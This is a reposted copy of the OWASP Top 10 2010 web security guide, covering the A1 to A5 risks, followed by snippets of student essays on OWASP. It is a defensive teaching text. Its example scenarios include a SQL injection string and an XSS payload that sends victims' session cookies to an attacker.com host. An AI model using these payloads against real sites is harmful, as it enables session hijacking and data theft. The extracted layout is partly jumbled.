TermPaperWarehouse.com - Free Term Papers, Essays and Research Documents

The Research Paper Factory

Free Essay

Owasp

In:

Submitted By nsphoenix
Words 5349
Pages 22
O
Foreword

About OWASP
About OWASP
The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. At OWASP you’ll find free and open … • Application security tools and standards • Complete books on application security testing, secure code development, and security code review • Standard security controls and libraries • Local chapters worldwide • Cutting edge research • Extensive conferences worldwide • Mailing lists • And more … all at www.owasp.org All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in all of these areas. OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open-source software projects, OWASP produces many types of materials in a collaborative, open way. The OWASP Foundation is the non-profit entity that ensures the project’s long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board, Global Committees, Chapter Leaders, Project Leaders, and project members. We support innovative security research with grants and infrastructure. Come join us!

Insecure software is already undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our digital infrastructure gets increasingly complex and interconnected, the difficulty of achieving application security increases exponentially. We can no longer afford to tolerate relatively simple security problems like those presented in the OWASP Top 10. The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. This release of the OWASP Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release. We encourage you to use the Top 10 to get your organization started with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications create in their enterprise. But the Top 10 is not an application security program. Going forward, OWASP recommends that organizations establish a strong foundation of training, standards, and tools that makes secure coding possible. On top of that foundation, organizations should integrate security into their development, verification, and maintenance processes. Management can use the data generated by these activities to manage cost and risk associated with application security. We hope that the OWASP Top 10 is useful to your application security efforts. Please don’t hesitate to contact OWASP with your questions, comments, and ideas, either publicly to OWASP-TopTen@lists.owasp.org or privately to dave.wichers@owasp.org. http://www.owasp.org/index.php/Top_10

Copyright and License
Copyright © 2003 – 2010 The OWASP Foundation This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For any reuse or distribution, you must make clear to others the license terms of this work.

I
Welcome

Introduction

Welcome to the OWASP Top 10 2010! This significant update presents a more concise, risk focused list of the Top 10 Most Critical Web Application Security Risks. The OWASP Top 10 has always been about risk, but this update makes this much more clear than previous editions. It also provides additional information on how to assess these risks for your applications. For each item in the top 10, this release discusses the general likelihood and consequence factors that are used to categorize the typical severity of the risk. It then presents guidance on how to verify whether you have problems in this area, how to avoid them, some example flaws, and pointers to links with more information. The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.

Warnings
Don’t stop at 10. There are hundreds of issues that could affect the overall security of a web application as discussed in the OWASP Developer’s Guide. This is essential reading for anyone developing web applications today. Guidance on how to effectively find vulnerabilities in web applications are provided in the OWASP Testing Guide and OWASP Code Review Guide, which have both been significantly updated since the previous release of the OWASP Top 10. Constant change. This Top 10 will continue to change. Even without changing a single line of your application’s code, you may already be vulnerable to something nobody ever thought of before. Please review the advice at the end of the Top 10 in “What’s Next For Developers, Verifiers, and Organizations” for more information. Think positive. When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP has just produced the Application Security Verification Standard (ASVS) as a guide to organizations and application reviewers on what to verify. Use tools wisely. Security vulnerabilities can be quite complex and buried in mountains of code. In virtually all cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools. Push left. Secure web applications are only possible when a secure software development lifecycle is used. For guidance on how to implement a secure SDLC, we recently released the Open Software Assurance Maturity Model (SAMM), which is a major update to the OWASP CLASP Project.

Acknowledgements
Thanks to Aspect Security for initiating, leading, and updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.

We’d like to thank those organizations that contributed their vulnerability prevalence data to support the 2010 update:     Aspect Security MITRE – CVE Softtek WhiteHat Security Inc. – Statistics

We’d also like to thank those who have contributed significant content or time reviewing this update of the Top 10:             Mike Boberski (Booz Allen Hamilton) Juan Carlos Calderon (Softtek) Michael Coates (Aspect Security) Jeremiah Grossman (WhiteHat Security Inc.) Jim Manico (for all the Top 10 podcasts) Paul Petefish (Solutionary Inc.) Eric Sheridan (Aspect Security) Neil Smithline (OneStopAppSecurity.com) Andrew van der Stock Colin Watson (Watson Hall, Ltd.) OWASP Denmark Chapter (Led by Ulf Munkedal) OWASP Sweden Chapter (Led by John Wilander)

RN

Release Notes

What changed from 2007 to 2010?
The threat landscape for Internet applications constantly changes. Key factors in this evolution are advances made by attackers, the release of new technology, as well as the deployment of increasingly complex systems. To keep pace, we periodically update the OWASP Top 10. In this 2010 release, we have made three significant changes: 1) We clarified that the Top 10 is about the Top 10 Risks, not the Top 10 most common weaknesses. See the details on the “Application Security Risks” page below. 2) We changed our ranking methodology to estimate risk, instead of relying solely on the frequency of the associated weakness. This has affected the ordering of the Top 10, as you can see in the table below. 3) We replaced two items on the list with two new items: + ADDED: A6 – Security Misconfiguration. This issue was A10 in the Top 10 from 2004: Insecure Configuration Management, but was dropped in 2007 because it wasn’t considered to be a software issue. However, from an organizational risk and prevalence perspective, it clearly merits re-inclusion in the Top 10; so now it’s back. ADDED: A10 – Unvalidated Redirects and Forwards. This issue is making its debut in the Top 10. The evidence shows that this relatively unknown issue is widespread and can cause significant damage.

+



REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
REMOVED: A6 – Information Leakage and Improper Error Handling. This issue is extremely prevalent, but the impact of disclosing stack trace and error message information is typically minimal. With the addition of Security Misconfiguration this year, proper configuration of error handling is a big part of securely configuring your application and servers.



OWASP Top 10 – 2007 (Previous)
A2 – Injection Flaws A1 – Cross Site Scripting (XSS) A7 – Broken Authentication and Session Management A4 – Insecure Direct Object Reference A5 – Cross Site Request Forgery (CSRF)

OWASP Top 10 – 2010 (New)
A1 – Injection A2 – Cross-Site Scripting (XSS) A3 – Broken Authentication and Session Management A4 – Insecure Direct Object References A5 – Cross-Site Request Forgery (CSRF)

A8 – Insecure Cryptographic Storage A10 – Failure to Restrict URL Access A9 – Insecure Communications A3 – Malicious File Execution A6 – Information Leakage and Improper Error Handling

A6 – Security Misconfiguration (NEW)
A7 – Insecure Cryptographic Storage A8 – Failure to Restrict URL Access A9 – Insufficient Transport Layer Protection A10 – Unvalidated Redirects and Forwards (NEW)

Risk
Threat Agents

Application Security Risks

What Are Application Security Risks?
Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.
Attack Vectors Attack Security Weaknesses Weakness Security Controls Control Asset Attack Weakness Control Function Attack Weakness Asset Weakness Control Impact Impact Technical Impacts Business Impacts Impact

Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may range from nothing, all the way through putting you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization. Together, these factors determine the overall risk.

What’s My Risk?
This update to the OWASP Top 10 focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.
Threat Agent Attack Vector Easy Weakness Prevalence Widespread Common Uncommon Weakness Detectability Easy Average Difficult Technical Impact Severe Moderate Minor Business Impact

References
OWASP
• OWASP Risk Rating Methodology • Article on Threat/Risk Modeling

External

?

Average Difficult

?

• FAIR Information Risk Framework • Microsoft Threat Modeling (STRIDE and DREAD)

However, only you know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack, or the technical impact may not make any difference. Therefore, you should evaluate each risk for yourself, focusing on the threat agents, security controls, and business impacts in your enterprise. Although previous versions of the OWASP Top 10 focused on identifying the most common “vulnerabilities”, they were also designed around risk. The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose the name that is best known and will achieve the highest level of awareness.

T10
A1 – Injection A2 – Cross-Site Scripting (XSS)

OWASP Top 10 Application Security Risks – 2010
•Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.

•XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A3 – Broken Authentication and •Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or Session exploit other implementation flaws to assume other users’ identities. Management A4 – Insecure Direct Object References A5 – Cross-Site Request Forgery (CSRF)
•A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

•A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. •Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.

A6 – Security Misconfiguration

A7 – Insecure Cryptographic Storage

•Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.

•Many web applications check URL access rights before rendering protected links and buttons. A8 - Failure to However, applications need to perform similar access control checks each time these pages are Restrict URL Access accessed, or attackers will be able to forge URLs to access these hidden pages anyway.

A9 - Insufficient Transport Layer Protection A10 – Unvalidated Redirects and Forwards

•Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or invalid certificates, or do not use them correctly.

•Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

A1
Threat Agents

Injection
Attack Vectors Security Weakness Technical Impacts Business Impacts

__________ Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

Exploitability EASY Attacker sends simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources.

Prevalence COMMON

Detectability AVERAGE

Impact SEVERE Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.

__________ Consider the business value of the affected data and the platform running the interpreter. All data could be stolen, modified, or deleted. Could your reputation be harmed?

Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.

Am I Vulnerable To Injection?
The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries. Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability. Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.

How Do I Prevent Injection?
Preventing injection requires keeping untrusted data separate from commands and queries. 1. The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful of APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood. If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s ESAPI has some of these escaping routines. Positive or “white list” input validation with appropriate canonicalization is also recommended, but is not a complete defense as many applications require special characters in their input. OWASP’s ESAPI has an extensible library of white list input validation routines.

2.

3.

Example Attack Scenario
The application uses untrusted data in the construction of the following vulnerable SQL call: String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'"; The attacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer’s. http://example.com/app/accountView?id=' or '1'='1 In the worst case, the attacker uses this weakness to invoke special stored procedures in the database that enable a complete takeover of the database and possibly even the server hosting the database.

References
OWASP
• OWASP SQL Injection Prevention Cheat Sheet • OWASP Injection Flaws Article • ESAPI Encoder API • ESAPI Input Validation API • ASVS: Output Encoding/Escaping Requirements (V6) • OWASP Testing Guide: Chapter on SQL Injection Testing

• OWASP Code Review Guide: Chapter on SQL Injection
• OWASP Code Review Guide: Command Injection

External
• CWE Entry 77 on Command Injection • CWE Entry 89 on SQL Injection

A2
Threat Agents

Cross-Site Scripting (XSS)
Attack Vectors Security Weakness Technical Impacts Business Impacts

__________
Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

Exploitability AVERAGE Attacker sends textbased attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.

Prevalence VERY WIDESPREAD

Detectability EASY

Impact MODERATE Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.

__________
Consider the business value of the affected system and all the data it processes. Also consider the business impact of public exposure of the vulnerability.

XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) Stored, 2) Reflected, and 3) DOM based XSS.

Detection of most XSS flaws is fairly easy via testing or code analysis.

Am I Vulnerable to XSS?
You need to ensure that all user supplied input sent back to the browser is verified to be safe (via input validation), and that user input is properly escaped before it is included in the output page. Proper output encoding ensures that such input is always treated as text in the browser, rather than active content that might get executed. Both static and dynamic tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, which makes automated detection difficult. Therefore, complete coverage requires a combination of manual code review and manual penetration testing, in addition to any automated approaches in use. Web 2.0 technologies, such as AJAX, make XSS much more difficult to detect via automated tools.

How Do I Prevent XSS?
Preventing XSS requires keeping untrusted data separate from active browser content. 1. The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them. See the OWASP XSS Prevention Cheat Sheet for more information about data escaping techniques. Positive or “whitelist” input validation with appropriate canonicalization and decoding is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, decode any encoded input, and then validate the length, characters, format, and any business rules on that data before accepting the input.

2.

Example Attack Scenario
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie'.

References
OWASP
• OWASP XSS Prevention Cheat Sheet • OWASP Cross-Site Scripting Article • ESAPI Project Home Page • ESAPI Encoder API • ASVS: Output Encoding/Escaping Requirements (V6) • ASVS: Input Validation Requirements (V5)

This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ. See A5 for info on CSRF.

• Testing Guide: 1st 3 Chapters on Data Validation Testing
• OWASP Code Review Guide: Chapter on XSS Review

External
• CWE Entry 79 on Cross-Site Scripting • RSnake’s XSS Attack Cheat Sheet

A3
Threat Agents

Broken Authentication and Session Management
Attack Vectors Security Weakness Technical Impacts Business Impacts

__________ Consider anonymous external attackers, as well as users with their own accounts, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.

Exploitability AVERAGE Attacker uses leaks or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to impersonate users.

Prevalence COMMON

Detectability AVERAGE

Impact SEVERE Such flaws may allow some or even all accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.

__________ Consider the business value of the affected data or application functions. Also consider the business impact of public exposure of the vulnerability.

Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.

Am I Vulnerable?
The primary assets to protect are credentials and session IDs. 1. Are credentials always protected when stored using hashing or encryption? See A7.

How Do I Prevent This?
The primary recommendation for an organization is to make available to developers: 1. A single set of strong authentication and session management controls. Such controls should strive to: a) meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management).

2.

Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?
Are session IDs exposed in the URL (e.g., URL rewriting)? Are session IDs vulnerable to session fixation attacks? Do session IDs timeout and can users log out? Are session IDs rotated after successful login? Are passwords, session IDs, and other credentials sent only over TLS connections? See A9. 2.

3. 4. 5. 6. 7.

b) have a simple interface for developers. Consider the ESAPI Authenticator and User APIs as good examples to emulate, use, or build upon. Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See A2.

See the ASVS requirement areas V2 and V3 for more details.

Example Attack Scenarios
Scenario #1: Airline reservations application supports URL rewriting, putting session IDs in the URL: http://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card. Scenario #2: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated. Scenario #3: Insider or external attacker gains access to the system’s password database. User passwords are not encrypted, exposing every users’ password to the attacker.

References
OWASP
For a more complete set of requirements and problems to avoid in this area, see the ASVS requirements areas for Authentication (V2) and Session Management (V3). • OWASP Authentication Cheat Sheet • ESAPI Authenticator API • ESAPI User API • OWASP Development Guide: Chapter on Authentication • OWASP Testing Guide: Chapter on Authentication

External
• CWE Entry 287 on Improper Authentication

A4
Threat Agents

Insecure Direct Object References
Attack Vectors Security Weakness Technical Impacts Business Impacts

__________ Consider the types of users of your system. Do any users have only partial access to certain types of system data?

Exploitability EASY Attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for. Is access granted?

Prevalence COMMON

Detectability EASY

Impact MODERATE Such flaws can compromise all the data that can be referenced by the parameter. Unless the name space is sparse, it’s easy for an attacker to access all available data of that type.

__________ Consider the business value of the exposed data. Also consider the business impact of public exposure of the vulnerability.

Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws and code analysis quickly shows whether authorization is properly verified.

Am I Vulnerable?
The best way to find out if an application is vulnerable to insecure direct object references is to verify that all object references have appropriate defenses. To achieve this, consider: 1. For direct references to restricted resources, the application needs to verify the user is authorized to access the exact resource they have requested. If the reference is an indirect reference, the mapping to the direct reference must be limited to values authorized for the current user.

How Do I Prevent This?
Preventing insecure direct object references requires selecting an approach for protecting each user accessible object (e.g., object number, filename): 1. Use per user or session indirect object references. This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. The application has to map the per-user indirect reference back to the actual database key on the server. OWASP’s ESAPI includes both sequential and random access reference maps that developers can use to eliminate direct object references. Check access. Each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.

2.

Code review of the application can quickly verify whether either approach is implemented safely. Testing is also effective for identifying direct object references and whether they are safe. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.

2.

Example Attack Scenario
The application uses unverified data in a SQL call that is accessing account information: String query = "SELECT * FROM accts WHERE account = ?"; PreparedStatement pstmt = connection.prepareStatement(query , … ); pstmt.setString( 1, request.getparameter("acct")); ResultSet results = pstmt.executeQuery( ); The attacker simply modifies the ‘acct’ parameter in their browser to send whatever account number they want. If not verified, the attacker can access any user’s account, instead of only the intended customer’s account. http://example.com/app/accountInfo?acct=notmyacct

References
OWASP
• OWASP Top 10-2007 on Insecure Dir Object References • ESAPI Access Reference Map API • ESAPI Access Control API (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )

For additional access control requirements, see the ASVS requirements area for Access Control (V4).

External
• CWE Entry 639 on Insecure Direct Object References • CWE Entry 22 on Path Traversal (which is an example of a Direct
Object Reference attack)

A5
Threat Agents

Cross-Site Request Forgery (CSRF)
Attack Vectors Security Weakness Technical Impacts Business Impacts

__________ Consider anyone who can trick your users into submitting a request to your website. Any website or other HTML feed that your users access could do this.

Exploitability AVERAGE Attacker creates forged HTTP requests and tricks a victim into submitting them via image tags, XSS, or numerous other techniques. If the user is authenticated, the attack succeeds.

Prevalence WIDESPREAD

Detectability EASY

Impact MODERATE Attackers can cause victims to change any data the victim is allowed to change or perform any function the victim is authorized to use.

__________ Consider the business value of the affected data or application functions. Imagine not being sure if users intended to take these actions. Consider the impact to your reputation.

CSRF takes advantage of web applications that allow attackers to predict all the details of a particular action. Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones. Detection of CSRF flaws is fairly easy via penetration testing or code analysis.

Am I Vulnerable to CSRF?
The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. You should check multistep transactions, as they are not inherently immune. Attackers can easily forge a series of requests by using multiple tags or possibly JavaScript. Note that session cookies, source IP addresses, and other information that is automatically sent by the browser doesn’t count since this information is also included in forged requests. OWASP’s CSRF Tester tool can help generate test cases to demonstrate the dangers of CSRF flaws.

How Do I Prevent CSRF?
Preventing CSRF requires the inclusion of a unpredictable token in the body or URL of each HTTP request. Such tokens should at a minimum be unique per user session, but can also be unique per request. 1. The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is subject to exposure. The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs the risk that the URL will be exposed to an attacker, thus compromising the secret token.

2.

OWASP’s CSRF Guard can be used to automatically include such tokens in your Java EE, .NET, or PHP application. OWASP’s ESAPI includes token generators and validators that developers can use to protect their transactions.

Example Attack Scenario
The application allows a user to submit a state changing request that does not include anything secret. Like so: http://example.com/app/transferFunds?amount=1500 &destinationAccount=4673243243 So, the attacker constructs a request that will transfer money from the victim’s account to their account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

Similar Documents

Premium Essay

Applying Owasp to a Web Security Assessment

...Assessment Worksheet Applying OWASP to a Web Security Assessment Course Name and Number: _____________________________________________________ Student Name: ________________________________________________________________ Instructor Name: ______________________________________________________________ Lab Due Date: ________________________________________________________________ Overview In this lab, you explored the Open Web Application Security Project (OWASP) Web site and reviewed its Web application test methodology. You studied the standards and guides published by this project and summarized your findings. Finally, you drafted a Web Application Test Plan based on the information you gained in your OWASP research. Lab Assessment Questions & Answers 1. Identify the four recognized business functions and each security practice of OpenSAMM. 1) Governance 2) Construction 3) Verification 4) Deployment 2. Identify and describe the four maturity levels for security practices in SAMM. 1) Implicit starting point representing the activities in the Practice being unfulfilled 2) Initial understanding and ad hoc provision of Security Practice 3) Increase efficiency and/or effectiveness of the Security Practice 4) Comprehensive mastery of the Security Practice at scale 3. What are some activities an organization could perform for the security practice of Threat Assessment? Threat Assessment involves accurately identifying and characterizing potential attacks...

Words: 574 - Pages: 3

Premium Essay

Com545 Lab 5

...any weaknesses, technical flaws, or vulnerabilities. Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution (Open Web Application Security Project [OWASP], 2014a). Vulnerability is a flaw or weakness in a system's design, implementation, operation or management that could be exploited to compromise the system's security objectives. A threat is anything such as a malicious external attacker, an internal user, or a system instability that can harm the owner’s assets by an application or resource of value, such as data in a database or in the file system by exploiting vulnerabilities. A test is an action to demonstrate that an application meets the security requirements of its stakeholders (OWASP, 2014a). Test to Be Performed The first phase in security assessment is focused on collecting as much information as possible about a target application. Information Gathering is the most critical step of an application security test. The security test should endeavor to test as much of the code base as possible. Thus mapping all possible paths through the code to facilitate thorough testing is paramount (OWASP, 2012b). This task can be carried out in many different ways such as by using public tools or search engines, scanners, sending simple HTTP requests, or specially crafted requests. It is possible to force an application to leak information by disclosing error...

Words: 5541 - Pages: 23

Premium Essay

Assessment 4

...Assessment Worksheet Applying OWASP to a Web Security Assessment Web Security Management COM-545 Course Name and Number: _____________________________________________________ Plinio Alves Student Name: ________________________________________________________________ Manh Nguyen Instructor Name: ______________________________________________________________ 10/30/15 Lab Due Date: ________________________________________________________________ Overview In this lab, you explored the Open Web Application Security Project (OWASP) Web site and reviewed its Web application test methodology. You studied the standards and guides published by this project and summarized your findings. Finally, you drafted a Web Application Test Plan based on the information you gained in your OWASP research. Lab Assessment Questions & Answers 1. Identify the four recognized business functions and each security practice of OpenSAMM. The four business function are governance, construction, verification and deployment. 2. Identify and describe the four maturity levels for security practices in SAMM. Phase I: Awareness & Planning Phase II: Education & Testing Phase III: Architecture & Infrastructure Phase IV: Governance & Operational Security 3. What are some activities an organization could perform for the security practice of Threat Assessment? Starting with simple threat models and building to more detailed methods of threat analysis and weighting, an organization improves...

Words: 586 - Pages: 3

Premium Essay

Vlab

...organization could perform for the security practice of Threat Assessment? a. Identify threats and establish responses to these threats. 4. What are the two recommended assessment styles for SAMM, and how are they used? a. Processes handling vulnerability reports and operational incidents 5. What are the three main objectives of the OWASP Application Security Verification Standard (ASVS) Project? a. Understand, establish and compliance 6. Identify the four levels used for ASVS. a. Automated verification, manual verification, design verification, and internal verification 7. According to the OWASP development guide, what are some guidelines for handling credit cards on Web sites? a. Use compliant equipment, maintain security, and unique keys 8. What are the four known data-validation strategies? a. Constrain, accept, reject, and sanitize 9. When should the testing process be introduced in the Software Development Lifecycle (SDLC)? a. Prototype development 10. What is black-box testing? a. A method of software testing that examines the functionality of an application without peering into its internal structures. 11. According the OWASP Development guide, what are some basic best practices for handling authentication when designing and developing Web-based software? a. Protect brand, know your business,...

Words: 276 - Pages: 2

Free Essay

Hello

...Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant          www.nethemba.com             www.nethemba.com       Nethemba – All About Security  Highly experienced certified IT security experts (CISSP, C|EH, SCSecA) Core business: All kinds of penetration tests, comprehensive web  application security audits, local system and wifi security audits, security  consulting, forensic analysis, secure VoIP, ultra­secure systems OWASP activists: Leaders of Slovak/Czech OWASP chapters, co­authors  of the most recognized OWASP Testing Guide v3.0, working on new version  We are the only one in Slovakia/Czech Republic that offer:     Penetration tests and security audits of SAP Security audit of smart RFID cards Unique own and sponsored security research in many areas (see  our references – Vulnerabilities in public transport SMS tickets,  cracked the most used Mifare Classic RFID cards)        www.nethemba.com            What are WAFs?  Emerged from IDS/IPS focused on HTTP  protocol and HTTP related attacks Usually contain a lot of complex reg­exp rules  to match Support special features like cookie encryption,  CSRF protection, etc. Except of free mod_security they are quite  expensive (and often there is no correlation  between the price and their filtering capabilities)         www.nethemba.com             WAFs implementations  Usually they are deployed in “blacklisting mode” ...

Words: 527 - Pages: 3

Premium Essay

Ifsm 304 B2

...WEB SECURITY POLICY IFSM 304 Overview : With the increasing amount of personal data that is being compiled on the Internet and specifically individual’s medical information we must look at the ethical dilemma of who has access to our data. Not only general demographic data such as full name, home address, phone number, and date of birth but also extremely sensitive medical information such as diagnosis and medication prescribed. Even though the convenience of digital records accessible to care providers via the web can expedite service, security and privacy have to be considered and maintained. An organizational policy is required to provide guidance, direction and responsibilities to ensure compliance with all Health Insurance Portability and Accountability Act (HIPAA) requirements. HIPAA is the acronym that was passed by Congress in 1996. (Health, n.d.) Purpose: To promulgate organizational policy, procedures, and program management for web security. This policy defines the technical controls and security configurations users and information technology (IT) administrators are required to implement in order to ensure the confidentiality, integrity, and availability of the data environment in accordance with  HIPAA does the following: Provides the ability to transfer and continue health insurance coverage for millions of American workers and their families when they change or lose their jobs; Reduces health care fraud and abuse; Mandates industry-wide standards...

Words: 1100 - Pages: 5

Premium Essay

Sql Injection.

...ABSTRACT This term paper discusses the security exposures of a server that occur due to a SQL injection flaw in a web application that communicate with a database. Over ten years have passed since a famous hacker coined the term “SQL injection” and it is still considered one of the major application threats. A lot has been said on this vulnerability, but not all of the aspects and implications have been uncovered, yet. This paper aim is to collate some of the existing knowledge, introduce new techniques and demonstrate how to get complete control over the database management system's underlying operating system, file system and internal network through SQL injection vulnerability in over-looked and theoretically not exploitable scenarios. This paper also discuss about the prevention from the SQL Injection, not only in ORACLE but also in PHP, C#, JAVA and other languages. INDEX ABSTRACT………………………………………………………………………………….....02 INTRODUCTION……………….…………………………….…….………………………….04 BLIND SQL INJECTION…………………………………….………………………………..05 SQL INJECTION OVERVIEW…………………………….………………………………....06 CATEGORIES OF SQL INJECTION ATTACKS…………………………………………..07 WHAT’S VULNERABLE…………………………………………………………..…………08 WHAT’S NOT VULNERABLE…………………………………………………….………….08 SQL INJECTION METHODS……………………………………….……………….……….09 SQL MANIPULATION………………………………………………………..……………….09 CODE INJECTION……………………………………………………….……………………10 FUNCTION CALL INJECTION……………………………………………………………….11 BUFFER OVERFLOWS………………………………………………………………………13 ...

Words: 3449 - Pages: 14

Premium Essay

Hello Hello

